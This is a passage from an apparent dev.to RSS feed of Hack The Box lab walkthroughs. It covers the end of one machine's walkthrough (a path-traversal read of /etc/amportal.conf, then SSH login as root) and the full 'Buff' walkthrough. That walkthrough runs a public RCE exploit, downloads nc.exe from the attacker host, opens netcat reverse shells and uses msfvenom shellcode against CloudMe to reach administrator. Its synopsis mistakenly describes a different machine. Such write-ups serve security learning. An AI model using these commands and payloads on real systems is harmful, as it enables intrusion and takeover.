&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Type "&lt;a href="https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&amp;amp;module=Accounts&amp;amp;action" rel="noopener noreferrer"&gt;https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&amp;amp;module=Accounts&amp;amp;action&lt;/a&gt;" into your browser based on the information in the middle of the code.&lt;/p&gt;

&lt;p&gt;The result of "dirbuster" already confirms the existence of "/vtigercrm".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F46it45sbbegh9smrn05v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F46it45sbbegh9smrn05v.png" alt="Screenshot_2021-03-22_23-20-06"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It's hard to read, so let's view the page source. You will see the username and password.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyyrx1ryf8wck23gax7pg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyyrx1ryf8wck23gax7pg.png" alt="Screenshot_2021-03-22_23-26-28"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Make an ssh connection to the target machine with the username "root" and the password "jEhdIekWmdjE".&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ssh root@10.10.10.7
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After connecting over SSH, read root.txt to get the flag.&lt;/p&gt;

</description>
      <category>hackthebox</category>
    </item>
    <item>
      <title>【Hack the Box】Buff - Walkthrough</title>
      <dc:creator>ikkyu</dc:creator>
      <pubDate>Thu, 14 Jan 2021 12:35:32 +0000</pubDate>
      <link>https://dev.to/ikk_hck/hack-the-box-buff-walkthrough-22gi</link>
      <guid>https://dev.to/ikk_hck/hack-the-box-buff-walkthrough-22gi</guid>
      <description>&lt;p&gt;From the HackTheBox&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--32OQVOoy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/ph8tybelpdwxlm5qilkl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--32OQVOoy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/ph8tybelpdwxlm5qilkl.png" alt="Screenshot from 2021-01-14 19-23-53"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SYNOPSIS: Grandpa is one of the simpler machines on Hack The Box; however, it covers the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge.&lt;/p&gt;
&lt;h1&gt;
  
  
  Enumeration
&lt;/h1&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Nmap 7.80 scan initiated Fri Sep 25 20:44:58 2020 as: nmap -sV -sC -Pn -oA nmap --script vuln 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.198
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.198:8080/
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/facilities.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/packages.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/about.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/contact.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/index.php
|     Form id: 
|_    Form action: include/process_login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2010-0425   10.0    https://vulners.com/cve/CVE-2010-0425
|       CVE-1999-1412   10.0    https://vulners.com/cve/CVE-1999-1412
|       CVE-1999-1237   10.0    https://vulners.com/cve/CVE-1999-1237
|       CVE-1999-0236   10.0    https://vulners.com/cve/CVE-1999-0236
|       CVE-2009-1955   7.8 https://vulners.com/cve/CVE-2009-1955
|       CVE-2007-6423   7.8 https://vulners.com/cve/CVE-2007-6423
|       CVE-2007-0086   7.8 https://vulners.com/cve/CVE-2007-0086
|       CVE-2020-11984  7.5 https://vulners.com/cve/CVE-2020-11984
|       CVE-2009-3095   7.5 https://vulners.com/cve/CVE-2009-3095
|       CVE-2007-4723   7.5 https://vulners.com/cve/CVE-2007-4723
|       CVE-2009-1891   7.1 https://vulners.com/cve/CVE-2009-1891
|       CVE-2009-1890   7.1 https://vulners.com/cve/CVE-2009-1890
|       CVE-2008-2579   6.8 https://vulners.com/cve/CVE-2008-2579
|       CVE-2007-5156   6.8 https://vulners.com/cve/CVE-2007-5156
|       CVE-2020-9490   5.0 https://vulners.com/cve/CVE-2020-9490
|       CVE-2014-0231   5.0 https://vulners.com/cve/CVE-2014-0231
|       CVE-2011-1752   5.0 https://vulners.com/cve/CVE-2011-1752
|       CVE-2010-1452   5.0 https://vulners.com/cve/CVE-2010-1452
|       CVE-2010-0408   5.0 https://vulners.com/cve/CVE-2010-0408
|       CVE-2009-2699   5.0 https://vulners.com/cve/CVE-2009-2699
|       CVE-2007-0450   5.0 https://vulners.com/cve/CVE-2007-0450
|       CVE-2005-1268   5.0 https://vulners.com/cve/CVE-2005-1268
|       CVE-2003-0020   5.0 https://vulners.com/cve/CVE-2003-0020
|       CVE-2001-1556   5.0 https://vulners.com/cve/CVE-2001-1556
|       CVE-1999-0678   5.0 https://vulners.com/cve/CVE-1999-0678
|       CVE-1999-0289   5.0 https://vulners.com/cve/CVE-1999-0289
|       CVE-1999-0070   5.0 https://vulners.com/cve/CVE-1999-0070
|       CVE-2009-1195   4.9 https://vulners.com/cve/CVE-2009-1195
|       CVE-2020-11993  4.3 https://vulners.com/cve/CVE-2020-11993
|       CVE-2011-1783   4.3 https://vulners.com/cve/CVE-2011-1783
|       CVE-2010-0434   4.3 https://vulners.com/cve/CVE-2010-0434
|       CVE-2008-2939   4.3 https://vulners.com/cve/CVE-2008-2939
|       CVE-2008-2168   4.3 https://vulners.com/cve/CVE-2008-2168
|       CVE-2008-0455   4.3 https://vulners.com/cve/CVE-2008-0455
|       CVE-2007-6420   4.3 https://vulners.com/cve/CVE-2007-6420
|       CVE-2007-6388   4.3 https://vulners.com/cve/CVE-2007-6388
|       CVE-2007-5000   4.3 https://vulners.com/cve/CVE-2007-5000
|       CVE-2007-4465   4.3 https://vulners.com/cve/CVE-2007-4465
|       CVE-2007-1349   4.3 https://vulners.com/cve/CVE-2007-1349
|       CVE-2007-6422   4.0 https://vulners.com/cve/CVE-2007-6422
|       CVE-2007-6421   3.5 https://vulners.com/cve/CVE-2007-6421
|_      CVE-2001-0131   1.2 https://vulners.com/cve/CVE-2001-0131

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 25 20:51:08 2020 -- 1 IP address (1 host up) scanned in 370.35 seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;I found that port 8080 is open.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KoW6trdu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/iws38q6xoe4pts5vhol0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KoW6trdu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/iws38q6xoe4pts5vhol0.png" alt="Screenshot from 2021-01-07 17-48-39"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;
  
  
  Local Privilege Escalation
&lt;/h1&gt;

&lt;p&gt;I searched for gym in metasploit and found 48506.py.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ searchsploit gym
[i] Found (#1): /home/ikkyu/exploitdb/files_exploits.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#1): /home/ikkyu/exploitdb/files_shellcodes.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                     | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I ran this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ python ~/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/

            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;C:\xampp\htdocs\gym\upload&amp;gt; whoami
�PNG
�
buff\shaun
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now I have access to the machine. Next we need to upload nc.exe to upgrade the shell.&lt;/p&gt;

&lt;p&gt;At local machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At target machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;C:\xampp\htdocs\gym\upload&amp;gt; curl http://10.10.14.6:8000/nc.exe -o nc.exe
�PNG
�
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;C:\xampp\htdocs\gym\upload&amp;gt; dir
�PNG
�
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

22/12/2020  12:04    &amp;lt;DIR&amp;gt;          .
22/12/2020  12:04    &amp;lt;DIR&amp;gt;          ..
22/12/2020  12:04                53 kamehameha.php
22/12/2020  11:40            38,616 nc.exe
               2 File(s)         38,669 bytes
               2 Dir(s)   7,315,296,256 bytes free
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I succeeded in uploading.&lt;br&gt;
Now we can get a reverse shell.&lt;/p&gt;

&lt;p&gt;At local machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At target machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;C:\xampp\htdocs\gym\upload&amp;gt; nc.exe 10.10.14.6 4444 -e cmd.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At local machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.198 49682
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I got a reverse shell.&lt;/p&gt;

&lt;h1&gt;
  
  
  Administrator Privilege Escalation
&lt;/h1&gt;

&lt;p&gt;I checked the running processes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;C:\xampp\htdocs\gym\upload&amp;gt;tasklist
tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0         44 K
Registry                       104                            0      7,392 K
smss.exe                       368                            0        384 K
csrss.exe                      456                            0      3,856 K
wininit.exe                    532                            0      4,608 K
csrss.exe                      540                            1      3,452 K
winlogon.exe                   604                            1      8,888 K
services.exe                   676                            0      8,296 K
lsass.exe                      696                            0     12,072 K
svchost.exe                    812                            0      2,520 K
fontdrvhost.exe                836                            0     13,900 K
fontdrvhost.exe                844                            1      8,100 K
svchost.exe                    860                            0     22,724 K
svchost.exe                    956                            0     12,036 K
svchost.exe                   1004                            0      6,028 K
dwm.exe                        328                            1     41,676 K
svchost.exe                    360                            0      8,292 K
svchost.exe                    948                            0      7,100 K
svchost.exe                    996                            0      9,664 K
svchost.exe                   1076                            0     18,084 K
svchost.exe                   1136                            0     18,504 K
svchost.exe                   1208                            0      5,984 K
svchost.exe                   1280                            0      5,680 K
svchost.exe                   1380                            0      8,672 K
svchost.exe                   1388                            0     10,612 K
svchost.exe                   1408                            0      4,044 K
svchost.exe                   1416                            0      7,352 K
svchost.exe                   1516                            0      9,604 K
svchost.exe                   1552                            0     12,944 K
Memory Compression            1564                            0     30,132 K
svchost.exe                   1592                            0      7,004 K
svchost.exe                   1676                            0      6,028 K
svchost.exe                   1772                            0      5,036 K
svchost.exe                   1780                            0      5,792 K
svchost.exe                   1824                            0      6,956 K
svchost.exe                   1880                            0      8,588 K
svchost.exe                   1988                            0      6,180 K
svchost.exe                   1456                            0      6,364 K
svchost.exe                   1336                            0      7,044 K
svchost.exe                   1240                            0      4,432 K
svchost.exe                   2060                            0      7,564 K
svchost.exe                   2132                            0      9,108 K
svchost.exe                   2284                            0      5,600 K
spoolsv.exe                   2300                            0     12,040 K
svchost.exe                   2424                            0      6,124 K
svchost.exe                   2736                            0      7,660 K
svchost.exe                   2748                            0     14,036 K
svchost.exe                   2760                            0     19,308 K
svchost.exe                   2768                            0      3,696 K
svchost.exe                   2756                            0      4,532 K
vmtoolsd.exe                  2788                            0     18,696 K
svchost.exe                   2796                            0     13,656 K
svchost.exe                   2804                            0     15,532 K
SecurityHealthService.exe     2832                            0     13,048 K
MsMpEng.exe                   2864                            0    169,640 K
VGAuthService.exe             2880                            0      7,840 K
svchost.exe                   2980                            0      7,080 K
svchost.exe                   2052                            0      9,868 K
svchost.exe                   3104                            0      9,768 K
svchost.exe                   3144                            0      3,568 K
dllhost.exe                   3660                            0     11,308 K
WmiPrvSE.exe                  3848                            0     14,188 K
msdtc.exe                     2720                            0      8,132 K
svchost.exe                   4540                            0     30,464 K
sihost.exe                    4596                            1     21,576 K
svchost.exe                   4620                            1     11,716 K
svchost.exe                   4672                            1     24,212 K
taskhostw.exe                 4768                            1      9,896 K
svchost.exe                   4932                            0      5,548 K
ctfmon.exe                    4992                            1     10,796 K
svchost.exe                   5080                            0      5,848 K
svchost.exe                   5092                            0     11,500 K
NisSrv.exe                    5212                            0      7,268 K
WmiPrvSE.exe                  5276                            0     18,888 K
explorer.exe                  5716                            1     79,172 K
svchost.exe                   5776                            0     16,212 K
svchost.exe                   5796                            0     11,372 K
svchost.exe                   5960                            0      5,312 K
svchost.exe                   6000                            0     12,380 K
svchost.exe                   5444                            0      4,852 K
svchost.exe                   4416                            0      4,976 K
ShellExperienceHost.exe       1048                            1     51,772 K
SearchUI.exe                  6360                            1    118,800 K
RuntimeBroker.exe             6588                            1     16,452 K
ApplicationFrameHost.exe      6780                            1     26,996 K
MicrosoftEdge.exe             7072                            1     55,284 K
browser_broker.exe            7160                            1      6,876 K
svchost.exe                   6316                            0      4,668 K
Windows.WARP.JITService.e     4404                            0      3,380 K
RuntimeBroker.exe             4356                            1      5,012 K
MicrosoftEdgeCP.exe           4220                            1     18,920 K
RuntimeBroker.exe             4464                            1     13,908 K
MicrosoftEdgeCP.exe           2672                            1     21,300 K
svchost.exe                   7332                            0     11,264 K
conhost.exe                   7464                            0      1,008 K
SearchIndexer.exe             8140                            0     23,680 K
MSASCuiL.exe                  7424                            1      6,812 K
vmtoolsd.exe                  5748                            1     13,220 K
httpd.exe                     1712                            0        460 K
mysqld.exe                    7716                            0      3,480 K
svchost.exe                   2572                            0      3,636 K
svchost.exe                   5304                            1     14,224 K
httpd.exe                     1460                            0      9,188 K
svchost.exe                   6552                            0     12,824 K
SgrmBroker.exe                2296                            0      2,704 K
svchost.exe                   8248                            0      6,984 K
CompatTelRunner.exe           1104                            0        632 K
conhost.exe                   8608                            0      1,216 K
svchost.exe                   7788                            0      8,192 K
Microsoft.Photos.exe          2528                            1      5,240 K
RuntimeBroker.exe             3856                            1     12,252 K
WinStore.App.exe              8424                            1     26,440 K
RuntimeBroker.exe             4556                            1      5,240 K
SystemSettings.exe            7764                            1     32,228 K
svchost.exe                   5984                            0      4,748 K
svchost.exe                   7484                            0      9,652 K
taskhostw.exe                 5920                            1     20,872 K
taskhostw.exe                 3520                            0     23,440 K
CompatTelRunner.exe           1548                            0      2,428 K
conhost.exe                   8792                            0      9,736 K
TrustedInstaller.exe          1016                            0      5,524 K
svchost.exe                    196                            0      5,352 K
TiWorker.exe                  2148                            0    103,996 K
svchost.exe                   8784                            0      7,844 K
svchost.exe                   6488                            0      3,792 K
svchost.exe                   8596                            0     11,860 K
cmd.exe                       7204                            0      2,432 K
conhost.exe                   9176                            0      9,132 K
nc.exe                        7192                            0      5,436 K
cmd.exe                       4504                            0      3,988 K
cmd.exe                        708                            0      3,208 K
conhost.exe                   2452                            0     10,868 K
CloudMe.exe                   3496                            0     26,884 K
timeout.exe                   5968                            0      3,920 K
tasklist.exe                  8796                            0      7,772 K
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I found CloudMe.exe. CloudMe is known to be vulnerable. I searched for cloudme in metasploit.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ searchsploit cloudme

--------------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
--------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)        | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | win
ws/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow   | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync &amp;lt; 1.11.0 - Buffer Overflow       | windows/remote/44027.py
CloudMe Sync &amp;lt; 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I found 48389.py. I looked it up on &lt;a href="https://www.exploit-db.com/exploits/48389"&gt;exploit-db&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--7PuG6nV4--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/4xferqztn85n1sqye61u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--7PuG6nV4--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/4xferqztn85n1sqye61u.png" alt="Screenshot from 2021-01-14 21-13-46"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we need to modify this code a bit and set up remote port forwarding from the target machine. You can see from exploit-db that the default payload launches the calculator.&lt;/p&gt;

&lt;p&gt;I created the payload. Here the port is set to 4445, but it can be anything.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.28 4445 -e cmd.exe' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1452 bytes
payload =  b""
payload += b"\xda\xcf\xd9\x74\x24\xf4\xbe\xe3\xce\xa2\x54\x5a"
payload += b"\x29\xc9\xb1\x3e\x31\x72\x19\x83\xea\xfc\x03\x72"
payload += b"\x15\x01\x3b\x5e\xbc\x47\xc4\x9f\x3d\x27\x4c\x7a"
payload += b"\x0c\x67\x2a\x0e\x3f\x57\x38\x42\xcc\x1c\x6c\x77"
payload += b"\x47\x50\xb9\x78\xe0\xde\x9f\xb7\xf1\x72\xe3\xd6"
payload += b"\x71\x88\x30\x39\x4b\x43\x45\x38\x8c\xb9\xa4\x68"
payload += b"\x45\xb6\x1b\x9d\xe2\x82\xa7\x16\xb8\x03\xa0\xcb"
payload += b"\x09\x22\x81\x5d\x01\x7d\x01\x5f\xc6\xf6\x08\x47"
payload += b"\x0b\x32\xc2\xfc\xff\xc9\xd5\xd4\x31\x32\x79\x19"
payload += b"\xfe\xc1\x83\x5d\x39\x39\xf6\x97\x39\xc4\x01\x6c"
payload += b"\x43\x12\x87\x77\xe3\xd1\x3f\x5c\x15\x36\xd9\x17"
payload += b"\x19\xf3\xad\x70\x3e\x02\x61\x0b\x3a\x8f\x84\xdc"
payload += b"\xca\xcb\xa2\xf8\x97\x88\xcb\x59\x72\x7f\xf3\xba"
payload += b"\xdd\x20\x51\xb0\xf0\x35\xe8\x9b\x9e\xc8\x7e\xa6"
payload += b"\xed\xca\x80\xa9\x41\xa2\xb1\x22\x0e\xb5\x4d\xe1"
payload += b"\x6a\x49\x04\xa8\xdb\xc1\xc1\x38\x5e\x8c\xf1\x96"
payload += b"\x9d\xa8\x71\x13\x5e\x4f\x69\x56\x5b\x14\x2d\x8a"
payload += b"\x11\x05\xd8\xac\x86\x26\xc9\xee\x12\x84\x8a\x91"
payload += b"\x0f\x44\x1b\x0e\xb8\xd0\xbf\xc1\x5b\x6b\x1c\x79"
payload += b"\xe5\xe6\xc0\xf0\x65\x94\x97\x9b\xe1\x38\x06\x3f"
payload += b"\xc4\xa5\xae\xda\x38\x14\x7f\x0b\x08\x66\x51\x62"
payload += b"\x5e\xa8\x9f\xbc\xbe\x80\xeb\x88\x8b\xc8\x3e\x94"
payload += b"\xd3\x6b\x2c\x32\x3a\x0e\xd6\xdf\x42"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Replace the payload part of 48389.py.&lt;br&gt;
Next, we need to upload chisel.exe for remote port forwarding, as before. After uploading, at the local machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ chisel server -p 1234 -reverse -v
2021/01/07 17:33:38 server: Reverse tunnelling enabled
2021/01/07 17:33:38 server: Fingerprint Wf5cpZzaVbfNXiWNsUT8AEcLYgEeOI7r3U440nagv08=
2021/01/07 17:33:38 server: Listening on http://0.0.0.0:1234
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At target machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;C:\xampp\htdocs\gym\upload&amp;gt;chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
2021/01/07 07:31:30 client: Connecting to ws://10.10.14.28:1234
2021/01/07 07:31:30 client: tun: proxy#1000=&amp;gt;--keepalive:1000: Listening
2021/01/07 07:31:30 client: tun: Bound proxies
2021/01/07 07:31:31 client: Handshaking...
2021/01/07 07:31:33 client: Sending config
2021/01/07 07:31:33 client: Connected (Latency 336.4421ms)
2021/01/07 07:31:33 client: tun: SSH connected
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now start a netcat listener on 4445 and execute the payload in a second terminal.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ nc -lnvp 4445
Listening on 0.0.0.0 4445

Connection received on 10.10.10.198 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32&amp;gt;whoami
whoami
buff\administrator
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We got administrator access.&lt;/p&gt;

</description>
      <category>hackthebox</category>
    </item>
  </channel>
</rss>
